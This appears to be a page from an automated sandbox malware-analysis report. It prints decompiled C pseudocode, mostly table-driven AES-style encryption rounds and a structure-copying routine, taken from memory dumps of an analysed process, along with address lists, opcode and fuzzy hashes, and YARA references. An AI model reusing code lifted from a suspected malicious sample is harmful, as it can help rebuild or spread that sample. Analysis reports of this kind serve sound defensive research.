								_t519 =  *(0x462518 + ( *(_t535 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + ( *(_t535 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x461918 + (_t468 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461d18 + (_t468 & 0x000000ff) * 4) & 0x000000ff ^  *(_t535 - 0x20);
								_t387 =  *(_t535 - 0x1c) ^ _t519;
								 *_t535 = _t519;
								_t535[1] = _t387;
								_t535 =  &(_t535[8]);
								_t470 = _t469 ^ _t387;
								 *(_t535 - 0x18) = _t470;
								 *(_t535 - 0x14) =  *(_t535 - 0x34) ^ _t470;
								_t471 =  *(_t535 - 0x14);
								_t48 = _t543 + 0x4608f0; // 0x2000000
								_t543 = _t543 + 4;
								_t525 =  *(0x461d18 + ( *(_t535 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + ( *(_t535 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_t471 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x461918 + (_t471 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t535 - 0x30);
								 *(_t535 - 0x10) = _t525;
								_t406 =  *(_t535 - 0x2c) ^ _t525;
								 *(_t535 - 0xc) = _t406;
								_t473 =  *(_t535 - 0x28) ^ _t406;
								 *(_t535 - 8) = _t473;
								 *(_t535 - 4) =  *(_t535 - 0x24) ^ _t473;
							} while (_t543 != 0x1c);
							L12:
							_t539 = _v8;
							_t530 = 1;
							if(_a12 == 1) {
								_t413 =  *(_t539 + 0xf0) << 2;
								if(_t413 != 0) {
									_t493 = _t539 + (_t413 + 2) * 4;
									_t532 = _t539 + 8;
									_t541 = 0;
									do {
										_t541 = _t541 + 4;
										_t413 = _t413 - 4;
										 *((intOrPtr*)(_t532 - 8)) =  *((intOrPtr*)(_t493 - 8));
										 *((intOrPtr*)(_t493 - 8)) =  *((intOrPtr*)(_t532 - 8));
										 *((intOrPtr*)(_t532 - 4)) =  *((intOrPtr*)(_t493 - 4));
										 *((intOrPtr*)(_t493 - 4)) =  *((intOrPtr*)(_t532 - 4));
										_t455 =  *_t532;
										 *_t532 =  *_t493;
										_t532 = _t532 + 0x10;
										_t314 =  *((intOrPtr*)(_t493 + 4));
										 *_t493 = _t455;
										_t493 = _t493 - 0x10;
										 *((intOrPtr*)(_t532 - 0xc)) = _t314;
										 *((intOrPtr*)(_t493 + 0x14)) =  *((intOrPtr*)(_t532 - 0xc));
									} while (_t541 < _t413);
									_t539 = _v8;
									_t530 = 1;
								}
								if( *(_t539 + 0xf0) > _t530) {
									_t414 = _t539 + 8;
									do {
										_t414 =  &(_t414[0x10]);
										_t484 =  *(_t414 - 8);
										_t486 =  *(_t414 - 4);
										 *(_t414 - 8) =  *(0x460918 + ( *(0x461d18 + ( *(_t414 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + ( *(_t414 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t484 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + ( *(_t414 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t488 =  *_t414;
										 *(_t414 - 4) =  *(0x460918 + ( *(0x461d18 + ( *(_t414 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + ( *(_t414 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t486 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + ( *(_t414 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t490 = _t414[4];
										 *_t414 =  *(0x460918 + ( *(0x461d18 + ( *_t414 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + ( *_t414 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t488 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + ( *_t414 & 0x000000ff) * 4) & 0x000000ff) * 4);
										_t530 = _t530 + 1;
										_t414[4] =  *(0x460918 + ( *(0x461d18 + (_t414[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + (_t414[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + (_t414[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
									} while (_t530 <  *(_t539 + 0xf0));
								}
							}
							_t270 = E105B3D1C(_t539, _a8);
						} else {
							_t270 = 0xffffff53;
						}
					}
				}
				return _t270;
			}

0x105b3728
0x105b372c
0x105b372f
0x105b3733
0x105b373e
0x105b3745
0x105b374b
0x105b3755
0x105b3760
0x105b39ea
0x105b39ed
0x105b3a46
0x105b3a48
0x105b3a4b
0x105b3a50
0x105b3a52
0x105b3a55
0x105b3a5a
0x105b3a5d
0x105b3a5e
0x105b3a5e
0x105b3a61
0x105b3aab
0x105b3ab1
0x105b3ab4
0x105b3ab7
0x105b3abc
0x105b3abe
0x105b3ac4
0x105b3ac6
0x105b3ace
0x105b3ad1
0x00000000
0x105b3766
0x105b3769
0x105b38e0
0x105b38e3
0x105b3940
0x105b3942
0x105b3944
0x105b3947
0x105b394a
0x105b3951
0x105b3954
0x105b3957
0x105b3958
0x105b395b
0x105b3963
0x105b3965
0x105b3968
0x105b396b
0x105b39b5
0x105b39bb
0x105b39be
0x105b39c1
0x105b39c7
0x105b39c9
0x105b39cf
0x105b39d1
0x105b39d9
0x105b39dc
0x00000000
0x105b376f
0x105b3772
0x105b377e
0x105b3781
0x105b37de
0x105b37e0
0x105b37e2
0x105b37e5
0x105b37e8
0x105b37ef
0x105b37f2
0x105b37f5
0x105b37f6
0x105b37f6
0x105b3837
0x105b3847
0x105b384a
0x105b384c
0x105b384e
0x105b3851
0x105b3854
0x105b385b
0x105b385e
0x105b3861
0x105b38ab
0x105b38b1
0x105b38b4
0x105b38b7
0x105b38bd
0x105b38bf
0x105b38c5
0x105b38c7
0x105b38cf
0x105b38d2
0x105b3ad6
0x105b3ad6
0x105b3adb
0x105b3adf
0x105b3aeb
0x105b3af0
0x105b3af5
0x105b3af8
0x105b3afb
0x105b3afd
0x105b3b00
0x105b3b06
0x105b3b09
0x105b3b0f
0x105b3b15
0x105b3b1a
0x105b3b1d
0x105b3b1f
0x105b3b21
0x105b3b24
0x105b3b27
0x105b3b29
0x105b3b2f
0x105b3b32
0x105b3b35
0x105b3b39
0x105b3b3e
0x105b3b3e
0x105b3b45
0x105b3b4b
0x105b3b4e
0x105b3b4e
0x105b3b51
0x105b3b85
0x105b3baf
0x105b3bde
0x105b3c07
0x105b3c36
0x105b3c5f
0x105b3caf
0x105b3cb0
0x105b3cb3
0x105b3b4e
0x105b3b45
0x105b3cc4
0x105b3774
0x105b3774
0x105b3774
0x105b3772
0x105b3769
0x105b3ccf

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
Instruction ID: c297c6908e85115593ee96851978bfdc2db59a00bc79fb68234f556a2b2785c5
Opcode Fuzzy Hash: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
Instruction Fuzzy Hash: 5002BF716005529FC318CF2EEC91526B7E1EF8E301709853AE486D7395EB74FA22DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004228B7, Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
Instruction ID: 2ff722b402dd1cb968047811478b8eaada24175be06acbaae8cb73f1bee3a1e2
Opcode Fuzzy Hash: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
Instruction Fuzzy Hash: 3E02C1716005519FD318CF2EEC9153AB7E1EF8E301748853AE486C7395EB74EA22DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0043450A, Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 2e3b19bf7ee36a531d95d42fa299a25bd2e154ed583d8d0915d7b163c9cd7bd2
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: C8C1B63220509349DF2D463984340BFBAA19ED67B5B1A276FD4B3CF2D4EF28E924D524

Uniqueness

Uniqueness Score: -1.00%

Function 105B322E, Relevance: .3, Instructions: 342
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E105B322E(signed int* __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				unsigned int _v36;
				unsigned int _t222;
				signed int _t229;
				signed int _t230;
				signed int _t258;
				intOrPtr _t338;
				intOrPtr _t347;
				intOrPtr _t356;
				intOrPtr _t369;
				unsigned int _t373;
				signed char _t379;
				unsigned int _t406;
				unsigned int _t422;
				unsigned int _t440;
				intOrPtr* _t478;
				unsigned int _t481;
				signed int _t485;
				unsigned int _t488;
				unsigned int _t489;
				unsigned int _t496;
				intOrPtr* _t506;
				unsigned int _t507;
				signed int _t509;
				unsigned int _t510;
				signed int* _t513;
				unsigned int _t515;
				unsigned int _t516;
				signed int _t518;

				_t513 = __ecx;
				_t506 = __edx;
				_t222 =  *(__ecx + 0xf0) >> 1;
				_v36 = _t222;
				if(_t222 <= 7 && _t222 != 0) {
					_v16 = E105B30FD( *((intOrPtr*)(__edx + 4))) ^ _t513[1];
					_v12 = E105B30FD( *((intOrPtr*)(_t506 + 8))) ^ _t513[2];
					_v32 = E105B30FD( *((intOrPtr*)(_t506 + 0xc))) ^ _t513[3];
					_t229 = E105B30FD( *_t506);
					_t230 = E105B3211();
					_t507 = _v12;
					_t373 = _t229 ^  *_t513 | _t230;
					_t481 = _v32;
					_v24 =  *(0x462118 + (_t507 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t373 >> 0x18) * 4) ^  *(0x462518 + (_t481 & 0x000000ff) * 4) ^ _t513[4];
					_v20 =  *(0x462118 + (_t481 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t507 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v16 >> 0x18) * 4) ^  *(0x462518 + (_t373 & 0x000000ff) * 4) ^ _t513[5];
					_v8 =  *(0x461d18 + (_t481 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t507 >> 0x18) * 4);
					_v8 = _v8 ^  *(0x462118 + (_t373 >> 0x00000008 & 0x000000ff) * 4);
					_t406 = _v16;
					_t509 = _v8 ^  *(0x462518 + (_t406 & 0x000000ff) * 4);
					_v8 = _t509;
					_v8 = _t509 ^ _t513[6];
					_t485 =  *(0x461918 + (_t481 >> 0x18) * 4) ^  *(0x462118 + (_t406 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t373 >> 0x00000010 & 0x000000ff) * 4);
					_t510 = _v36;
					_t258 = _v12 & 0x000000ff;
					while(1) {
						_t487 = _t485 ^  *(0x462518 + _t258 * 4) ^ _t513[7];
						_t514 =  &(_t513[8]);
						_v16 =  &(_t513[8]);
						_v12 = _t485 ^  *(0x462518 + _t258 * 4) ^ _t513[7];
						_t510 = _t510 - 1;
						if(_t510 == 0) {
							break;
						}
						_t515 = _v8;
						_t488 = _v24;
						_v28 =  *(0x462118 + (_t515 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t488 >> 0x18) * 4) ^  *(0x462518 + (_v12 & 0x000000ff) * 4) ^  *_v16;
						_v32 =  *(0x462118 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t515 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v20 >> 0x18) * 4) ^  *(0x462518 + (_t488 & 0x000000ff) * 4) ^  *(_v16 + 4);
						_v12 = _v12 >> 0x18;
						_t516 = _v16;
						_t422 = _t488;
						_t489 = _v20;
						_t379 =  *(0x461d18 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t515 >> 0x18) * 4) ^  *(0x462118 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x462518 + (_t489 & 0x000000ff) * 4) ^  *(_t516 + 8);
						_t496 =  *(0x461918 + _v12 * 4) ^  *(0x462118 + (_t489 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x462518 + (_v8 & 0x000000ff) * 4) ^  *(_t516 + 0xc);
						_v24 =  *(0x462118 + (_t379 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v28 >> 0x18) * 4) ^  *(0x462518 + (_t496 & 0x000000ff) * 4) ^  *(_t516 + 0x10);
						_v20 =  *(0x462118 + (_t496 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_t379 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_v32 >> 0x18) * 4) ^  *(0x462518 + (_v28 & 0x000000ff) * 4) ^  *(_t516 + 0x14);
						_v8 =  *(0x461d18 + (_t496 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x461918 + (_t379 >> 0x18) * 4);
						_v8 = _v8 ^  *(0x462118 + (_v28 >> 0x00000008 & 0x000000ff) * 4);
						_t440 = _v32;
						_t518 = _v8 ^  *(0x462518 + (_t440 & 0x000000ff) * 4);
						_v8 = _t518;
						_t513 = _v16;
						_v8 = _t518 ^ _t513[6];
						_t485 =  *(0x461918 + (_t496 >> 0x18) * 4) ^  *(0x462118 + (_t440 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x461d18 + (_v28 >> 0x00000010 & 0x000000ff) * 4);
						_t258 = _t379 & 0x000000ff;
					}
					_t338 = E105B30FD( *(0x462518 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t487 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x462118 + (_v20 >> 0x18) * 4) & 0xff000000 ^  *(0x461d18 + (_v24 & 0x000000ff) * 4) & 0x000000ff ^ _t514[1]);
					_t347 = E105B30FD( *(0x462118 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x462518 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_v24 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461d18 + (_v20 & 0x000000ff) * 4) & 0x000000ff ^ _t514[2]);
					_t356 = E105B30FD( *(0x462118 + (_v12 >> 0x18) * 4) & 0xff000000 ^  *(0x462518 + (_v24 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_v20 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461d18 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^ _t514[3]);
					_t369 = E105B30FD( *(0x461918 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x462518 + (_v20 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_v24 >> 0x18) * 4) & 0xff000000 ^  *(0x461d18 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_v16);
					_t478 = _a4;
					 *((intOrPtr*)(_t478 + 4)) = _t338;
					 *_t478 = _t369;
					 *((intOrPtr*)(_t478 + 8)) = _t347;
					 *((intOrPtr*)(_t478 + 0xc)) = _t356;
					return _t369;
				}
				return _t222;
			}

0x105b3235
0x105b3238
0x105b3240
0x105b3242
0x105b3248
0x105b3265
0x105b3273
0x105b3280
0x105b3283
0x105b328c
0x105b3291
0x105b3294
0x105b32ae
0x105b32d8
0x105b3316
0x105b332f
0x105b334b
0x105b334e
0x105b335a
0x105b3363
0x105b3369
0x105b337c
0x105b3386
0x105b3389
0x105b3588
0x105b358f
0x105b3592
0x105b3595
0x105b3598
0x105b359b
0x105b359e
0x00000000
0x00000000
0x105b3391
0x105b33ac
0x105b33da
0x105b341c
0x105b3421
0x105b342f
0x105b3439
0x105b343b
0x105b345d
0x105b348d
0x105b34c9
0x105b3511
0x105b352a
0x105b3547
0x105b354a
0x105b3556
0x105b355d
0x105b3562
0x105b3568
0x105b357e
0x105b3585
0x105b3585
0x105b35f9
0x105b3651
0x105b36ad
0x105b370b
0x105b3710
0x105b3713
0x105b3716
0x105b3718
0x105b371b
0x00000000
0x105b371e
0x105b3724

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8001e367c53f8ee38b432c69aa832e26edc9402d3f3a3057c2bcae96baadee62
Instruction ID: a27cb4e4c96b9aee43569888ba7fdb0a781c881b5bb4f5ca7a4823568a9406a7
Opcode Fuzzy Hash: 8001e367c53f8ee38b432c69aa832e26edc9402d3f3a3057c2bcae96baadee62
Instruction Fuzzy Hash: 6DE1B070A10458AFCB08CF5DE8A287E73F1FB49300755816EE582E7391DA74FA12EB95

Uniqueness

Uniqueness Score: -1.00%

Function 0043493F, Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 478658756e30f7f1ba970a92bd0e41a0f1cb0e3296731c86c1f7c4ea0a9e4636
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: F6C1B43220609349DF2D4639C4741BFBAA19ED67B1B1A275ED4B2CF2C4EF18E924D624

Uniqueness

Uniqueness Score: -1.00%

Function 004340D5, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 89fb698572b7cf86533d0eea82b05fcf403d339a8e9ac14319646ffa1aaa429a
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 67C1D8322060534ADF2D463984341BFBAA09EE57B1B1A276FD4B3CF2C4EF18E964D524

Uniqueness

Uniqueness Score: -1.00%

Function 00433CBD, Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 498841ff8ffc577a75ecd23afa02eae88d75307c74ebf78fc8dbafedbe6a6034
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: C7C1723230615349DB2D4A39843417FBAB19EE57B2B1A275FD4B2CF2C4EF28DA249614

Uniqueness

Uniqueness Score: -1.00%

Function 105AA38F, Relevance: .3, Instructions: 277
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E105AA38F(intOrPtr* __ecx, intOrPtr* __edx, void* __esi) {
				intOrPtr* _v8;
				void* __edi;
				void* _t101;
				void* _t102;
				intOrPtr* _t220;
				signed int _t227;
				signed int _t232;
				signed int _t235;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t250;
				signed int _t253;
				signed int _t263;
				signed int _t273;
				signed int _t276;
				signed int _t279;
				signed int _t282;
				signed int _t285;
				signed int _t288;
				void* _t291;
				intOrPtr* _t294;
				void* _t299;
				signed int _t302;
				void* _t305;

				_t299 = __esi;
				_push(__ecx);
				_t220 = __ecx;
				_t294 = __edx;
				_v8 = __edx;
				if(__ecx == 0 || __edx == 0 ||  *((intOrPtr*)(__ecx + 4)) == 0) {
					_t102 = 0xffffff53;
				} else {
					_t223 =  *__ecx;
					if( *__ecx != 0) {
						E105AD583(_t101, _t223, __edx, __esi);
					}
					_t102 = E105AA351(_t294, 1);
					if(_t102 >= 0) {
						 *_t220 = _t294;
						_push(_t299);
						 *((short*)(_t220 + 0x218)) =  *((intOrPtr*)( *_t294));
						_t4 = _t294 + 0x80; // 0x0
						 *((short*)(_t220 + 0x380)) =  *_t4;
						_t6 = _t294 + 0x7c; // 0x0
						 *((intOrPtr*)(_t220 + 0x36c)) =  *_t6;
						_t8 = _t294 + 0x84; // 0x0
						 *((intOrPtr*)(_t220 + 0x384)) =  *_t8;
						_t10 = _t294 + 0x78; // 0x0
						 *((intOrPtr*)(_t220 + 0x204)) =  *_t10;
						_t12 = _t294 + 0x74; // 0x0
						 *((intOrPtr*)(_t220 + 0x80)) =  *_t12;
						_t227 = ( *( *_t294 + 2) & 3) << 0x00000004 |  *(_t220 + 0x308) & 0x0000ffcf;
						 *(_t220 + 0x308) = _t227;
						_t302 = ( *( *_t294 + 3) & 1) << 0x0000000a | _t227 & 0x0000fbff;
						 *(_t220 + 0x308) = _t302;
						_t19 = _t294 + 0x60; // 0x69006c
						 *((char*)(_t220 + 0x315)) =  *_t19;
						_t21 = _t294 + 0x5e; // 0x6c0061
						_t273 = ( *_t21 >> 0x00000002 & 1) << 0x00000008 |  *(_t220 + 0x30a) & 0x0000feff;
						 *(_t220 + 0x30a) = _t273;
						_t24 = _t294 + 0x5e; // 0x6c0061
						_t232 = ( *_t24 >> 0x00000003 & 1) << 0x00000009 | _t273 & 0x0000fdff;
						 *(_t220 + 0x30a) = _t232;
						_t26 = _t294 + 0x5e; // 0x6c0061
						_t276 = ( *_t26 >> 0x00000004 & 1) << 0x0000000b | _t232 & 0x0000f7ff;
						 *(_t220 + 0x30a) = _t276;
						_t28 = _t294 + 0x5e; // 0x6c0061
						_t235 = ( *_t28 >> 0x00000001 & 1) << 0x00000007 | _t276 & 0x0000ff7f;
						 *(_t220 + 0x30a) = _t235;
						_t30 = _t294 + 0x5e; // 0x6c0061
						 *(_t220 + 0x30a) = ( *_t30 >> 0x00000005 & 1) << 0x0000000c | _t235 & 0x0000efff;
						_t32 = _t294 + 0x62; // 0x6e0069
						 *((short*)(_t220 + 0x31c)) =  *_t32;
						_t34 = _t294 + 0x64; // 0x67006e
						 *((short*)(_t220 + 0x31e)) =  *_t34;
						_t36 = _t294 + 0x66; // 0x2e0067
						 *((short*)(_t220 + 0x322)) =  *_t36;
						_t38 = _t294 + 0x5d; // 0x6c006100
						_t279 = ( *_t38 >> 0x00000004 & 1) << 0x00000002 | _t302 & 0x0000fffb;
						 *(_t220 + 0x308) = _t279;
						_t40 = _t294 + 0x5d; // 0x6c006100
						_t240 = ( *_t40 >> 0x00000005 & 1) << 0x00000003 | _t279 & 0x0000fff7;
						 *(_t220 + 0x308) = _t240;
						_t42 = _t294 + 0x5d; // 0x6c006100
						_t282 = ( *_t42 & 1) << 0x00000006 | _t240 & 0x0000ffbf;
						 *(_t220 + 0x308) = _t282;
						_t44 = _t294 + 0x5d; // 0x6c006100
						_t243 = ( *_t44 >> 0x00000001 & 1) << 0x00000007 | _t282 & 0x0000ff7f;
						 *(_t220 + 0x308) = _t243;
						_t46 = _t294 + 0x5d; // 0x6c006100
						_t285 = ( *_t46 >> 0x00000002 & 1) << 0x00000008 | _t243 & 0x0000feff;
						 *(_t220 + 0x308) = _t285;
						_t48 = _t294 + 0x5d; // 0x6c006100
						_t246 = ( *_t48 >> 0x00000003 & 1) << 0x00000009 | _t285 & 0x0000fdff;
						 *(_t220 + 0x308) = _t246;
						_t50 = _t294 + 0x5d; // 0x6c006100
						 *(_t220 + 0x308) =  *_t50 >> 0x00000006 & 0x000000ff | _t246 & 0x0000fffc;
						_t52 = _t294 + 0x5e; // 0x6c0061
						_t250 = ( *_t52 >> 0x00000006 & 1) << 0x00000003 |  *(_t220 + 0x30c) & 0x0000fff7;
						 *(_t220 + 0x30c) = _t250;
						_t55 = _t294 + 0x5e; // 0x6c0061
						_t288 = ( *_t55 >> 0x00000007 & 0x000000ff) << 0x00000004 | _t250 & 0x0000ffef;
						 *(_t220 + 0x30c) = _t288;
						_t57 = _t294 + 0x5f; // 0x69006c00
						_t253 = ( *_t57 & 1) << 0x00000006 | _t288 & 0x0000ffbf;
						 *(_t220 + 0x30c) = _t253;
						_t291 = 1;
						_t59 = _t294 + 0x61; // 0x6e006900
						 *(_t220 + 0x30c) = ( *_t59 >> 0x00000005 & 1) << 0x0000000f | _t253 & 0x00007fff;
						_t61 = _t294 + 0x24; // 0x10000
						 *((intOrPtr*)(_t220 + 0x124)) =  *_t61;
						 *((intOrPtr*)(_t220 + 0x128)) =  *((intOrPtr*)(_t294 + 0x28));
						_t65 = _t294 + 0x2c; // 0x3a0043
						 *((intOrPtr*)(_t220 + 0x12c)) =  *_t65;
						_t67 = _t294 + 0x30; // 0x57005c
						 *((intOrPtr*)(_t220 + 0x130)) =  *_t67;
						_t69 = _t294 + 0x34; // 0x6e0069
						 *((intOrPtr*)(_t220 + 0x148)) =  *_t69;
						_t71 = _t294 + 0x38; // 0x6f0064
						 *((intOrPtr*)(_t220 + 0x15c)) =  *_t71;
						_t73 = _t294 + 0x3c; // 0x730077
						 *((intOrPtr*)(_t220 + 0x160)) =  *_t73;
						_t75 = _t294 + 0x40; // 0x53005c
						 *((intOrPtr*)(_t220 + 0x14c)) =  *_t75;
						_t78 = _t294 + 0x44; // 0x730079
						 *(_t220 + 0x150) =  *(_t220 + 0x150) ^ ( *(_t220 + 0x150) ^  *_t78) & 0x0000007f;
						_t81 = _t294 + 0x44; // 0x730079
						_t83 = _t294 + 0x44; // 0x730079
						 *(_t220 + 0x150) = ( *_t81 ^  *(_t220 + 0x150)) & 0x0000007f ^  *_t83;
						_t85 = _t294 + 0x48; // 0x4f0057
						 *((intOrPtr*)(_t220 + 0x154)) =  *_t85;
						_t87 = _t294 + 0x4c; // 0x360057
						 *((intOrPtr*)(_t220 + 0x158)) =  *_t87;
						_t89 = _t294 + 0x54; // 0x700044
						_t305 =  *_t89;
						if(_t305 == 0) {
							E105C2D6E(_t294,  *(_t220 + 4), 0, 0x158);
							_t291 = 1;
						} else {
							_t263 = 0x56;
							memcpy( *(_t220 + 4), _t305, _t263 << 2);
							_t294 = _v8;
						}
						if(( *(_t220 + 0x308) & 0x00000030) != 0x30) {
							_t291 = E105AA2E1(_t220);
						}
						_t95 = _t294 + 0x6c; // 0x650078
						_t102 = _t291;
						 *((intOrPtr*)(_t220 + 0x88)) =  *_t95;
						_t97 = _t294 + 0x70; // 0x0
						 *((intOrPtr*)(_t220 + 0x8c)) =  *_t97;
						_t99 = _t294 + 0x5c; // 0x610063
						 *((char*)(_t220 + 0x20e)) =  *_t99;
					}
				}
				return _t102;
			}

0x105aa38f
0x105aa392
0x105aa395
0x105aa397
0x105aa399
0x105aa39e
0x105aa77f
0x105aa3b6
0x105aa3b6
0x105aa3ba
0x105aa3bc
0x105aa3bc
0x105aa3c6
0x105aa3cd
0x105aa3d3
0x105aa3dc
0x105aa3e0
0x105aa3e7
0x105aa3ee
0x105aa3f5
0x105aa3f8
0x105aa3fe
0x105aa404
0x105aa40a
0x105aa40d
0x105aa413
0x105aa416
0x105aa434
0x105aa439
0x105aa455
0x105aa458
0x105aa45f
0x105aa462
0x105aa468
0x105aa489
0x105aa48c
0x105aa499
0x105aa4ab
0x105aa4ae
0x105aa4bb
0x105aa4cd
0x105aa4d0
0x105aa4dd
0x105aa4ee
0x105aa4f1
0x105aa4f8
0x105aa516
0x105aa51f
0x105aa524
0x105aa52b
0x105aa52f
0x105aa536
0x105aa53a
0x105aa541
